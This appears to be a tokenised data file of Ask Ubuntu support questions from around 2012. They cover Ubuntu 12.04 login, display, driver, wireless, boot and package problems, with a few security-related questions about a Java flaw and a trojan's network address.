181840	installation password	i just updated to ubuntu 11.10 and am getting `` your authentication attempt was unsuccessful . '' i am the only user and am the administrator , during login on my keyring i set to logon automatically , but it still askes me for my password . so i put in my old one and it works . but when i go to install apps it asks again and nothing works ! also if i go to user accounts and try to unlock or change my password it wo n't let me ! it says under password `` none '' so what 's going on ? ! i 'm new to ubuntu ! help !
181843	gnome-panel does n't work correctly with separate x screens	i am having a problem with gnome3 ( actually , i have it set to fallback mode , or gnome 2 ) . i have two displays and i need an x screen ( i used nvidia-xconfig and nvidia-settings to do this ) for each screen . however , every time i either restart x or log in , gnome seems to be adding the objects values under /gnome/gnome-panel/layouts ( ex . first time i set the two separate x screens i had clock , then log out/in , there was clock and clock1 under objects , and then log out/in there were three , clock , clock1 , clock2 , ... ... .log out/in , ... ... ... ... 30 times ... .clock , clock1 , clock2 , ... ... clock 42 ... .. ! ! the same thing goes for top-panels , menu-bars , etc . ) after a while , i found out i could remove all those using the dconf-editor , going to /gnome/gnome-panel/layouts , removing all the repetitions under fields objects-id-list and top-id-list and leaving one value of each object . this is not a solution but at least allow me to keep using linux without so much trouble . however , the problem persists every time i restart x or log in . i now finally learned about `` dconf '' and where the user profile settings are located ( ~/.config/dconf/user ) and one can use `` dconf '' to see the keys . in my case , i need to change/remove many keys ( all those clocksx , workspace-x , menu-bar-x , etc. , where goes from 1 to 42 and still counting ) so it 's really tedious and boring to be changing one by one using `` dconf write '' . so i found `` dconf dump '' , which actually allow me to dump everything into a .txt file and edit the file really quick ( i.e , `` dconf dump / > > dump_user.txt '' ) . the problems ? two of them : how do i `` load '' back `` dump_user.txt '' i edited into the user profile ? ( i read somewhere there was a `` dconf reload '' but reload does n't exist as a command under `` dconf '' ) how do i stop gnome from keep adding more objects to my desktop environment every time i log in/restart x ? note : the problem does n't occur when i set the displays to use twinview feature ( i.e. , the desktop is extended/shared by both displays ) . however , for my case i need two separate x 's . any help/suggestion would be greatly appreciated . edit : i found a way to remove the keys permanently . `` this is possible using the dconf reset command , though it 's not clear if that 's a side-effect of a bug . for a single key : dconf reset `` /path/to/the/key '' must not end with a / . for a whole path : dconf reset -f `` /path/to/the/path/ '' must end with a / . '' from http : //askubuntu.com/questions/45535/how-do-i-clean-up-my-dconf-database but again ( as the author of the original post said ) , it 's a temporary patch not the solution . i have no idea why dconf ( or whatever piece of software does that ) keeps adding keys every time i restart x/log in . thanks
181845	usb 3.0 controller is not recognized	i have a thinkpad e430 notebook , and the intel 's usb 3.0 controller can not be recognized by ubuntu 12.04 . the led on my usb-hdd is white instead of blue ( and in windows 7 , it is blue when connected to usb 3.0 port , and is white when connected to 2.0 ) . and the transfer speed is around 25mb/s instead of 65mb/s in windows 7 . i 'm not familiar with linux systems , so i 've no clue about what 's going wrong . i 've searched the web , but got no solution .
181850	change font programmatically for gtk3 textview ( quickly-widgets texteditor )	in an app using pygi and gtk3 , i 'm trying to let the user set the font family and size in a textview through my app 's settings dialog . in pygi the textview object has `` set '' methods for several properties , but not for font properties . i can set the font family via css using a css style provider . but i ca n't change that css dynamically to respect the font selected by a user . so how can i do this ? ( note that the widget in question is actually the texteditor from the quickly-widgets package and i 'm using quickly to build the app . ) edit to clarify : i 'm not wedded to using css , that just seems to be gtk 's preferred approach . what i 'm hoping for is a method of some kind , like gtktextview.setfontproperties ( ) or something like that . i ca n't find anything like that for font properties . thanks , ian
181851	how to obtain a s/mime certificate for e-mail encryption ?	there are parties , e.g . enterprises , that uses s/mime certificates for e-mail encryption . to my understanding thunderbird has support by default for s/mime . but i have not found a way to obtain a personal s/mime certificate to be used on a ubuntu system . thus my question : how to obtain a s/mime certificate for e-mail encryption ? moreover , is it correct to believe that thunderbird has support by default for s/mime ? i am fully aware of pgp , gnupg and openpgp for public-key cryptography and secure e-mail communication . in my opinion , it is very useful that openpgp is installed by default on ubuntu systems . but i need to find a method to communicate securely with parties that use s/mime and not pgp/gnupg/openpgp .
181856	change icon size in unity 's application switcher ( alt-tab ) ?	when i switch applications with alt-tab under unity ( full version , not the 2d one ) , my open applications are displayed , represented by their respective icon . these icons are quite huge ... everytime i hit alt-tab i 'm a bit surprised by the thing that pops in my screen . i 'd prefer a much smaller icon size.. is there a way to change this somewhere ? they seem to be ~96x96 , i 'd aim for 48x48 : )
181860	ubuntu 12.04 gui does n't load after virtualbox crash	i have ubuntu 12.04 64 bit installed as a virtual os in virtualbox ( the host is windows 7 ) . the virtualbox data file is on a usb drive that lost connection to the pc while a session was running . now when i try to start the ubuntu virtual os , i get a terminal login screen , but no gui . when i try to login i get the message sh : 1 : can not create /var/run/motd.new : directory nonexistent any suggestions ? can i recover the system ?
181862	how can i troubleshoot problems with an intel wireless card ?	how can i troubleshoot the issue ? problems range through : poor connection speeds dropped connections failure to connect seemingly random disconnects poor range card is stuck in hardware disabled state
181863	can not apply unity -- reset after modifying files	so i have an idea of what i did wrong , i am just not sure how to fix it . i used the unity glass mod : http : //www.omgubuntu.co.uk/2012/07/unity-glass-offers-refined-new-look-for-the-unity-launcher after removing it , i can not reset unity and it does not work . even after purging unity and reinstalling it , i can not seem to replace the missing files . $ unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1c00027 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done i/o warning : failed to load external entity `` /home/arcline/.compiz/session/10b624e5c8f98c5325134625607758338300000051770001 '' initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:7038 ) : gtk-warning ** : theme parsing error : gnome-panel.css:28:11 : not using units is deprecated . assuming 'px ' . ( compiz:7038 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed segmentation fault ( core dumped )
181864	no desktop after cleaning stuff with ubuntu tweak	i used janitor from ubuntu tweak and after restarting my computer , there is nothing there . no top panel , no left launher , no dash ... nothing . is there a way to get everything back ?
181867	/tmp shows 690 mb full , actual size 72 k , why ?	why is /tmp diretory on my system showing 690 mb full , whereas du -sh /tmp shows only 72k full ? drwxrwxrwt 2 lightdm lightdm 4096 aug 29 21:49 at-spi2 drwx -- -- -- 2 ankit ankit 4096 aug 29 21:50 keyring-0jtfoy drwx -- -- -- 2 ankit ankit 4096 aug 29 21:44 keyring-rchlll drwx -- -- -- 2 root root 16384 jul 22 02:10 lost+found drwx -- -- -- 2 ankit ankit 4096 jan 1 1970 orbit-ankit drwx -- -- -- 2 lightdm lightdm 4096 aug 29 21:50 pulse-2l9k88emlgn7 drwx -- -- -- 2 root root 4096 aug 29 21:44 pulse-pkdhtxmmr18n drwx -- -- -- 2 ankit ankit 4096 aug 29 21:50 pulse-zr1tzuazfmqw drwx -- -- -- 2 ankit ankit 4096 aug 29 21:44 ssh-dlsloxoq2203 drwx -- -- -- 2 ankit ankit 4096 aug 29 21:50 ssh-mrqqvryy3316 -rw -- -- -- - 1 ankit ankit 0 aug 29 21:45 tmp0qnng4 -rw -- -- -- - 1 ankit ankit 0 aug 29 21:50 tmpvvsmt6 -rw -- -- -- - 1 ankit ankit 0 aug 29 21:49 tmpy9gadz -rw-rw-r -- 1 lightdm lightdm 0 aug 29 21:44 unity_support_test.0 ankit @ duster : /tmp $ df -h df : `/home/ankit/.gvfs ' : transport endpoint is not connected filesystem size used avail use % mounted on /dev/sda1 79g 11g 65g 14 % / udev 2.9g 4.0k 2.9g 1 % /dev tmpfs 1.2g 868k 1.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.9g 220k 2.9g 1 % /run/shm /dev/sda7 38g 690m 35g 2 % /tmp /dev/sda5 93g 26g 63g 30 % /home /dev/sda6 93g 1.6g 87g 2 % /boot /dev/sda3 154g 69g 78g 48 % /home/mount_150 ankit @ duster : /tmp $ ankit @ duster : /tmp $ ankit @ duster : /tmp $ sudo du -sh /tmp/ 72k
181868	authentication issue with cups 5.3.1 on smb printer	i am trying to print to a samba printer via cups . i have configured the printer allright , but there seems to be a problem with authentication . the error message i get is session setup failed : nt_status_logon_failure the gui also tells me : idle - tree connect failed ( nt_status_access_denied ) it used to work with previous versions of cups ( 1.4.3 and 1.4.6 ) under ubuntu 11.04 i am doing this on a clean install of ubuntu 12.04 , cups version 1.5.3 . i have tried changing some rights relating to apparmor , with no success as described here : http : //www.compdigitec.com/labs/2010/01/16/fixing-usrlibcupsbackendsmb-failed-error-in-ubuntu/ i have been working with ubuntu for years - but this is the kind of problem i need help with .
181877	kde desktop without dolphin file manager	it is possible to install kde4 with plasma and effects , but without default applications like dolphin ? i already have xfce with all useful applications .
181879	how create a keyboard shortcut for a launcher to bring it on top of windows	i just created a lot of keyboard shortcuts for my programs , like scite , zend studio , firefox , but when i trigger the shortcuts a new instance of each programs is started , but i only wish to bring the existing instance in front of all other windows . how can i do this i.e use a keyboard shortcut to bring a specific program to appear on top of all windows ?
181880	does each juju environment specified require its own master node ?	or will different juju environments share the same master node ?
181882	ca n't use keyboard at all on 12.04	i have a toshiba satellite l770d laptop . decided i wanted to put ubuntu 12.04 on and duel-boot with my windows 7 . problem is , no matter what type of keyboard i use or attempt to use , i get nothing . no typing , no response , nothing when running the livecd . i would n't care since my mouse still works , except that the ability to type is a bit of a necessity when trying to create the root user profile and logging on . obviously , i ca n't use the kernel or anything like that to attempt the fix , seeing as how i ca n't type at all , no matter what keyboard i try . ( tried 3 , 2 usb and my internal keyboard . ) so , to the question , how would i fix this ? i ca n't get passed the initial install phase without the ability to type anything . p.s . nothing is wrong with any of the keyboards , seeing as how they all work perfectly on my windows installation .
181884	does java security flaw affects ubuntu also ?	there are rumors about an actual java security problem . the bsi advises people to deactivate java plugins version 7 and prior in all kind of os , even in linux . does this mean , i should deactivate iced-tea plugin in ubuntu now ? or is this specific version not concerned ? thank you very much for your answer . i looked for this information in the internet already but was n't able to find what you found out since i do n't know much about the interdependence . i have disabled icedtea plugin now . better safe than sorry ... how can we warn all the other ubuntu users out there ? according to the bsi the exploit is already excessively used in the coutries norway , germany and the netherlands . since ubuntu is also affected as you concluded this seems to be really important . also heise security writes now , the bug concerns every kind of os and browser which is supported by java . btw , oracle has finally managed to fix the bug in ver 7 update 7 http : //www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-verbose-1835710.html how can i tell when the problem is fixed in the icedtea version ubuntu uses ? aditional information : http : //www.kb.cert.org/vuls/id/636312
181888	ca n't seem to reinstall ubuntu	i have xp on 1 drive and on a separate drive i had ubuntu installed on a partition . something went wrong and i backed up and tried to reinstall ubuntu 12.04 . i have tried to reinstall from a live cd several times several times but i guess i 'm not doing it right . when i boot grub comes up and if i chose xp i can boot normally , if i chose ubuntu i only get to a command prompt . i thought it was a problem with grub so i booted into the live cd and installed boot repair . i used boot repair a couple of different ways and it never worked . here is the output file it generated if it would help : http : //paste.ubuntu.com/1170935/
181894	ubuntu 12.04 running slow : how to improve performance ?	i used to work in a computer ( dell inspiron ) with 2gb ram , 80gb dd and intel core processor with ubuntu 10 under gnome , and went well . it went slow when i had a virtual machine ( virtualbox with 512-1024 ram ) open , a big ide from tibco ( say like netbeans using 600mb ram ) and firefox . then i installed ubuntu 12.04 in another computer ( dell inspiron too ) intel core 2 duo , 4gb ram , 500gb dd and i can only run the same programs and it gets really slow . even worse than with the previous machine . i first tried with ubuntu 64 bits and it was too slow , then i moved to ubuntu 12.04 32 bits and is a little faster . even worse , sometimes i 'm not doing anything and i see the disk drive reading a lot . when i list the processes all the processes are using like 2 % of the cpu and the memory is below the 3gb used . i do n't know what to do . i have changed the swapiness ( now is 10 , before was 60 ) , i have tested it with unity 3d and 2d , i have installed preload and other programs alike but nothing . i 'm thinking it could be the partitions in the disk drive , but i do n't know why it makes so many disks operations . thanks in advance for your help . what else can i do ? is something with unity ? is my computer configuration edit : ( dma output ) /dev/sda : timing cached reads : 5236 mb in 2.00 seconds = 2624.56 mb/sec timing buffered disk reads : 240 mb in 3.01 seconds = 79.84 mb/sec sudo dmesg |grep dma [ 0.000000 ] dma 0x00000010 - > 0x00001000 [ 0.000000 ] dma zone : 32 pages used for memmap [ 0.000000 ] dma zone : 0 pages reserved [ 0.000000 ] dma zone : 3951 pages , lifo batch:0 [ 0.790649 ] ata1 : sata max udma/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xbfa0 irq 14 [ 0.790652 ] ata2 : pata max udma/100 cmd 0x170 ctl 0x376 bmdma 0xbfa8 irq 15 [ 0.952622 ] ata2.00 : atapi : sony cd-rw/dvd-rom crx880a , kd09 , max udma/33 [ 0.953649 ] ata1.00 : ata-8 : wdc wd5000bevt-00a03t0 , 01.01a01 , max udma/133 [ 0.960633 ] ata1.00 : configured for udma/133 [ 0.968317 ] ata2.00 : configured for udma/33 [ 1.208604 ] mmc0 : sdhci controller on pci [ 0000:02:01.1 ] using dma
181895	touchpad issue with my hp mini	i am new to ubuntu . installed later version but having issues with my touchpad . i 've got an hp mini can someone guide me step by step how to solve it . even where write the code single step by step . any help it is really appreciated . many thanks
181897	minecraft for ubuntu 12.04 does not pass done loading screen	when i try to run the minecraft demo game on ubuntu i get to a screen that says '' minecraft updating '' '' done loading '' but it was never done loading . i am not sure if i am being impatient or there is something wrong because i have left the game to update and when i returned 15-20 min later nothing had happened . please help i have been through many different forums and tried installing oracle java 7 which i removed for openjdk java 7 . i added the lwjgl package to the .minecraft folder and still nothing has happened . thanks ahead of time !
181901	install to a raid 0 array from windows	i have an asus mb with an nvidia raid 0 array set up as my boot disc with 200gb unformatted ready for ubuntu . will wubi install onto this ?
181905	what is the difference between nvidia-graphics-drivers and nvidia-graphics-drivers-updates	i see that there are two packages nvidia-current and nvidia-current-updates . the apparently stem from nvidia-graphics-drivers and nvidia-graphics-drivers-updates respectively : https : //launchpad.net/ubuntu/+source/nvidia-graphics-drivers https : //launchpad.net/ubuntu/+source/nvidia-graphics-drivers-updates i wonder why there are two packages , and what is the difference between these two packages ?
181908	ca n't download from update manager or software center	i am new to linux so please bear with me , i have 12.04 installed , when i am trying to download from ubuntu software center or if i try to check for updates via update manager , i get this message : requires installation of untrusted packages . and there are two buttons : ok and repair . if i click ok , it does nothing , but if i click repair then i get this message : failed to download repository information . then i click on ok to close the message box then this message appears : check internet connection . is there any way to fix it ?
181911	can i install `` jupiter-support-eee '' package on non eee laptop ?	i have installed `` jupiter '' on my sony vaio vpcz2 laptop . it is very useful for me . i want to know what is the functionality of `` jupiter-support-eee '' package ? is it only for eee netbook ? can i install it on my laptop ? thanks .
181915	installing vnc server/client in ubuntu 12.04	i want to install vnc server/client with the gui in ubuntu 12.04 precise pangolin . i found a tutorial for this task . but if i followed this tutorial i will lose my unity desktop and ends with a gnome classic desktop . i do n't want that . i can install gnome 3 as described in this article along with unity . my questions are , can i install vnc and use it with the gui in my gnome 3 desktop ? if yes , then how ? any suggestions are also welcome . thank you in advance .
181918	help ! i cant run the machine !	when i try to run the machine a messeage appear in the black screen sayinh '' this kernel requires an x86-64 cpu , buy only detected in a i686 cpu . unable to boot please use a kernel appropiate for your cpu '' i 'll aprecciate
181922	what does `` ext '' mean , as referred to by the sfntly installation instructions ?	this should be an easy one . i 'm following these instructions to install sfntly . the instructions for installing a package say that the package should be `` extracted to ext '' . what is meant by `` ext '' ? is this a directory ? ( i do n't see a directory called `` ext '' in the root . )
181924	is there a program that can adjust display brightness according to battery percentage ?	when i work in kubuntu , kde power management has a section that lets you automatically adjust display brightness according to battery percentage . i want to know if there is a tool like that in ubuntu 12.04 ? thanks .
181926	save display settings to xorg.conf	i can configure my display setting through `` system settings > displays '' but i can not save it to xorg.conf and i do n't have a xorg.conf at all in /etc/x11/ . how can i save the current settings into xorg.conf ?
181930	what to do regarding backdoor.wirenet.1	what precautions should one take in prevention of attack by trojan backdoor.wirenet.1 ? blocking all communications with 212.7.208.65 should be sufficient ? if so , how to do it ?
181932	how do i increase the terminal border size in xfce ?	the terminal ( and other applications ) borders seem to be only 1 pixel wide which makes them almost impossible to click . i am aware that alt+right click has the same function , but i need the borders able to be clicked . i found this solution : https : //bugs.launchpad.net/ubuntu/+source/unity-2d/+bug/878198/comments/8 but unfortunately it did not work for me ( i 'm using greybird as a theme , i tried the same fix with bluebird and it also did n't work ) . i am using xubuntu 12.04 xfce by the way . any help would be appreciated !
181934	font becomes unreadable	after switching from another account to my account , the font in firefox , thunderbird , acrobat , and pretty much all programs becomes unreadable . this only happens sometimes when i have left the computer on for the day . i use 12.04 on an e-machines e-725 . i had the same problem with 11.10 . has anybody ran into this before ? any help/suggestions appreciated .
181939	when attempting to dual-boot ubuntu 12.04 and windows 7 , boot loader can not mount root.disk	my pc manufacturer has already allocated all four primary disk partitions , so i attempted to install ubuntu 12.04 alongside windows 7 using wubi . when i select ubuntu from the boot menu , it drops to busybox shell and can not mount the root volume , even though it is visible in the windows file system . how do i get it to recognize its own pathnames ? i am an absolute beginner in linux command line .
181940	i need a wifi hotspot application	i need a wifi hotspot application like connectify ! i have a samsung galaxy s ii and it does n't find ad-hoc access point what can i do ?
181943	ubuntu 12.04 problem with 3592 ralink wireless chipset	all , on hp 3115m ( business version of dm1z ) with 64-bit ubuntu 12.04 there is a problem with the driver support for the ralink 3592 wireless chipset . when using rt2800pci driver , the connection intermittently disconnects and fails to reconnect until one toggles the wireless via the hardware key ( f12 ) off and then back on . after that it will connect but only for a little while before once again dropping the connection . connection to some routers is more prone to disconnection than others . i tried changing channels , encryption protocol ( wpa//wpa2 ) , even a/b/g/n with no consistent results . for this reason , i tried installing the official ralink drivers ( rt3562sta ) that can be downloaded from http : //www.ralinktech.com/en/04_support/support.php ? sn=501 ( namely rt3062pci/mpci/cb/pcie ( rt3060/rt3062/rt3562/rt3592 ) driver ) . i followed instructions ( similar to the ones found here : http : //ubuntuforums.org/showthread.php ? t=1850267 ) and installed the driver while blacklisting other drivers . now here 's the curious thing . if i modprobe the driver ( `` sudo modprobe rt3562sta '' , this is btw the name of the driver created by compiling ) , assuming that there are no other drivers loaded , i get nothing ( e.g . `` iwconfig '' and `` ifconfig '' list no wireless devices ) . however , if i type `` sudo ifconfig ra0 up '' the device does come up in `` iwconfig '' and `` ifconfig '' , the led on the keyboard turns on , and i can even scan for wireless networks via `` iwlist scan '' but the network-manager does not recognize existence of wireless . i also tried restarting network-manager and rebooting the machine and that had no effect . could this be because the wireless device is using ra0 as opposed to wlan0 ( as was the case with the old wireless card ) or is there something else causing problems ? if so , how could one change this ? any suggestions regarding this would be most appreciated .
181947	menu to let me choose os to run in a dual boot machine	i recently re-imaged my dell pc to dual-install windows 7 and ubuntu 12.04.1 lts . the dual-boot was a success , since i was able to start whichever os i wanted . now , i installed some software ( the openjdk package ) on the ubuntu side of the pc . upon restarting ubuntu , i unfortunately lost the ability to choose the os that i wanted to run ( i.e. , ubuntu ) . ordinarily , i 'd expect to : 1 . hit the power button 2 . a menu ( grub ? ) shows up listing all oss installed in the pc ( namely , win7 and ubuntu ) 3 . choose which os i want and hit enter . bingo . the problem is that i do n't see that menu ( step 2 above ) . instead , windows automatically starts , even when i hit f12 to see the boot options , none of which i understand . your help would be great ! thanks ! - kiptoo
181948	can i automatically purge every package i 've ever uninstalled ?	as an ubuntu noob , i install and uninstall a lot of packages , to try them out . however , for months , i made the mistake of using apt-get remove instead of apt-get purge , which i did n't even realize exists . is there a way to cause apt-get to purge every package i 've uninstalled ? my system is full of leftover files i neither want or need from dozens of different packages .
181956	dpkg crashing while trying to install a package	while attempting to install a package via apt-get the following . the first error i get is : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . and , if i run that command the box spins out of control and i get the following in /var/log/syslog aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398546 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398552 ] warning : at /build/buildd/linux-3.0.0/arch/x86/xen/multicalls.c:182 xen_mc_flush+01c0 ( ) aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398561 ] modules linked in : acpiphp aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398568 ] pid : 31063 , comm : java tainted : g d w 3.0.0-14-virtual # 23-ubuntu aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398576 ] call trace : aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398580 ] [ < c0648265 > ] ? printk+0x2d/0x2f aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398586 ] [ < c0150462 > ] warn_slowpath_common+0x72/0xa0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398593 ] [ < c0104883 > ] ? xen_mc_flush+0x1b3/0x1c0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398599 ] [ < c0104883 > ] ? xen_mc_flush+0x1b3/0x1c0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398605 ] [ < c01504b2 > ] warn_slowpath_null+0x22/0x30 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398611 ] [ < c0104883 > ] xen_mc_flush+0x1b3/0x1c0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398617 ] [ < c0104e7a > ] ? xen_extend_mmu_update+0x4a/0x70 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398624 ] [ < c0106565 > ] xen_set_pud_hyper+0x75/0x80 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398630 ] [ < c01065b9 > ] xen_set_pud+0x49/0x60 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398636 ] [ < c0132105 > ] pud_populate+0x45/0x60 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398642 ] [ < c0208a24 > ] __pmd_alloc+0x74/0x90 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398648 ] [ < c0208cb7 > ] handle_mm_fault+0x277/0x2c0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.398655 ] [ < c065f45b > ] do_page_fault+0x15b/0x4a0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.401923 ] [ < c020ba24 > ] ? remove_vma+0x44/0x60 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.401923 ] [ < c020d9b6 > ] ? sys_mmap_pgoff+0x106/0x1c0 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.401923 ] [ < c065f300 > ] ? vmalloc_fault+0x190/0x190 aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.401923 ] [ < c065c79f > ] error_code+0x67/0x6c aug 29 20:21:08 ip-10-202-191-4 kernel : [ 20571563.401923 ] -- - [ end trace 0b105e2a179ad013 ] -- -
181957	ubuntu 12.04 how can i gain access to arbitrary applications in nautilus ' `` open with '' dialog	i want to set a filetype to be opened by a specific program other than ubuntu 's default . i usually right click > properties > open with and select the application i need . this however does not work in this case . the application i want is not shown in the `` open with '' dialog and there apparently is no way i can browse to it or type in a custom command like i used to in 10.04 . i 'm aware of the above work-around which will work for each individual file but not make the app generally available from the `` open with '' dialog . is this a bug that i should file or a feature that can be worked around ?
181962	run script after switching user account `` to the same account ''	in ubuntu , when i click on switch user account ... and then choose the same account to log in ( for example if my name is john smith , i click on switch user account and then log into the john smith account again ) , how can i run a script after that ? ( i know , that i can run a script after `` first '' login by putting it in /etc/profile file , but this script is not executed again when i choose switch user account and then immediately log in back to the same account . )
181964	ubuntu 12.04 , intel centrino 1030 wireless-n 1030 not able to connect to wireless	i saw several similar threads , but none really does it ... i have 12.04 precise x64 installed and things worked great for some 10 days . then it all stopped - i was n't able to connect any more . even more , things were so scre*ed up that it were showing other network 's name while connecting : ( i have an asus k53sm-sx054 . here 's the text from dmesg related to my card : http : //fixee.org/paste/iaw23iw/ basically , it 's intel centrino wireless-n 1030 . not sure if it 's important , i had gnome with unity and then moved to kde . any ideas what to do ? i 'm on the verge of reinstalling things , but i already set plenty of things and have some things that i 'd need to back up ... and i 'm rather lazy to go on with it : ) edit : my wlan network is hidden . not sure if this should have any influence .
181967	how do i install ubuntu on a second harddrive ?	i have installed a second hard drive ( 256gb crucial ssd ) into an hp-dvt2000 series . i burned a cd with the download file . i can boot from the cd to the demo ubuntu ( 12.04 lts ) . i installed it , then removed the cd . on the following reboot i received the error that live file not found . how do i fix this error , or am i installing it wrong ?
181969	script to establish ssh tunnel and then run another program that uses the tunnel	i am running a gui app ( gnucash ) that connects to a remote postgres database via a secure shell session . i can use the ssh -l command to tunnel a local port and then separately run gnucash and this works fine . what i 'd like to do is use a single shell script that sets up the tunnel and then calls gnucash . is that possible ? if so , how do i do it ? currently , i run commands like the following in 2 separate terminal windows : ssh -l 5433:127.0.0.1:19097 username @ myserver.com.au gnucash postgres : //gnucash @ localhost:5433/gnucash_db if i simply put both lines in a shell script , the first line drops me into the remote shell and the second line does n't execute until i exit the remote shell . tia , rob hills
181970	installation of ubuntu 12.04 lts amd 64 bit but using it for intel	hi i have a full gaming pc but i have windows on it and when i install ubuntu its does not install until i switch off acpi=off but after i install it when i want to go into ubuntu it shows me a purple screen and i would like to install ubuntu with acpi=off enabled
181972	what does intermittent `` input/output error '' suggest ?	lately my ubuntu 12 system has started acting very strange . sometimes the computer freezes and then unfreezes 2 minutes later , and other times when i try a basic command like less i get the error bash : /usr/bin/less : input/output error . but this is intermittent too . any suggestions ? also if i try sudo reboot and enter my password , i get sudo : unable to open /var/lib/sudo/plato/7 : read-only file system before i used to be able to do sudo reboot fine . if i tail /var/log/syslog i do see these curious lines : ... . ata1 : softreset failed ( device not ready ) ... . ata1 : hard resettting link ... . ata1 : link is slow to respond , please be patient ( ready=0 ) what can i do to fix this ?
181975	recording guitar with rakarrack and audacity	i 'm trying to record my guitar with audacity and using rakarrack for effects . i have an lexicon alpha plugged in with usb and my guitar plugged into the lexicon alpha . i am able to record my guitar etc , but i can not record my guitar through rakarrack . jack does not seem to recognise the lexicon alpha . how can i make this working ?
181976	how to turn off unity in 12.04 lts ?	so i need to turn off unity gui and get back to the text user interface , how do i do that in ubuntu 12.04 lts ?
181978	apply theme on my linux	i 'd download a theme and i want to apply it , i 'm using linux ubuntu 12.4 system . and every time i tried to extract it i found a massage said : you do n't have the right permissions to extract archives in the folder `` file : ///usr/share/themes '' i 'm so new in linux , so what can i do ? ? ?
181979	extracting pure mpeg frames from mp3 from command line	is there a way to extract actual audio frames from mp3 ? ( which means also the meta data tags gon na be cut off . ) an imaginery command line : cat 1.mp3 | mpeg-frames-only > dump cat 1.mp3 | mpeg-frames-only | md5 p.s . i do n't think converting mpeg to wav is a good idea for my case . p.p.s . it 's better if there are few solutions to be able to test them against each other .
181981	between synpackmanager , update manager , and apt-get , which is the healthiest for my system ?	i 've been bouncing a lot between a few different update methods to see which i prefer the most , and i was wondering which of these is the 'healthiest ' for the system , or what your preferred update method is .
181982	how do i make a bootable usb stick from an iso image ? i 'm running kubuntu 12.04	why wo n't kb3 ( in kubuntu 12.04 ) recognize a usb drive and allow me to burn an iso image to it ? kb3 is the default iso burning application and it gets generally good reviews . but it pops up a dialog telling me that i do n't have an optical drive and it refuses to allow me to select the usb drive . what am i overlooking ? the computer is a thinkpad x220 tablet without an optical drive . what 's another recommended way to burn an iso to a usb drive in kubuntu ? the iso is for a firmware update utility . ( my question is not about how to install ubuntu . )
181987	move hard disk from one lenovo computer to another ? is it likely to work ?	i have a lenovo thinkpad x220 and have ordered a lenovo t430s . ideally i 'd like to move the ssd ( running 12.04 ) from the x220 to the new machine , rather than installing the os on the new one and updating apps and restoring home directory . is it likely to work if i just put the current drive in the new machine ?
181995	i ca n't set my resolution higher than 1024x768 in ubuntu 12.04	i 'm an nvidia gt 440 user . i can already click on the 1280x1024 option in monitors but as shown in the image below it outputs an error . the message says : the virtual size required does n't fit the available one , plus it says the maximum size is 1024x768 i tried many things and i ended thinking that the problem could probably be the edid info , so i installed the package read-edid . when i type sudo get-edid | parse-edid it prints this http : //pastebin.com/gsnajdnn if more explanation is needed i 'll post it as fast as i can
182004	why do i get a pae error trying to install 12.04 desktop 32 bit version on an ibm thinkpad t42	i have downloaded the 32 bit version of ubuntu 12.04 from the site and when i try to do a clean install on the computer it gives me the pae error saying the processor can not address 64 gig of memory . the 32 bit version i downloaded should not be looking for that function .
182006	please help newbie install jar	i am kyler , and i have a 12.04lts . will you please help me with the installation of minecraft http : //www.minecraft.net/
182008	what is the easiest and safest way to perform triple-boot ?	in my laptop i currently have windows 7 and ubuntu 12.04 in dual-boot . i tried the newest version of wattos ( based in ubuntu ) today from a live-usb , and decided to install it to my hard drive , to use whenever i am completely dependent on battery energy . however i do n't want to create any conflicts and boot problems , specially because my dvd drive is not working and thus i am unable to use windows 7 dvd to repair mbr . what is the safest way to install a second linux distribution ( in this case watt os ) and update grub menu , without major trouble ?
182009	problem accessing skydrive	i am running 12.04 ( precise pangolin ) and using the latest chromium browser to access ms skydrive on the web . i just get a blank page with no ui . at the same time , i am able to access other services like outlook mail . additionally , my friend running 11.10 ( oneiric ocelot ) can access and use the full skydrive ui . any idea why is this seen ?
182010	tried installing java problem	i was trying to install gimp and java , i successfully installed gimp but when i try to install java i get this error : e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/otto-kesselgulasch-gimp-precise.list
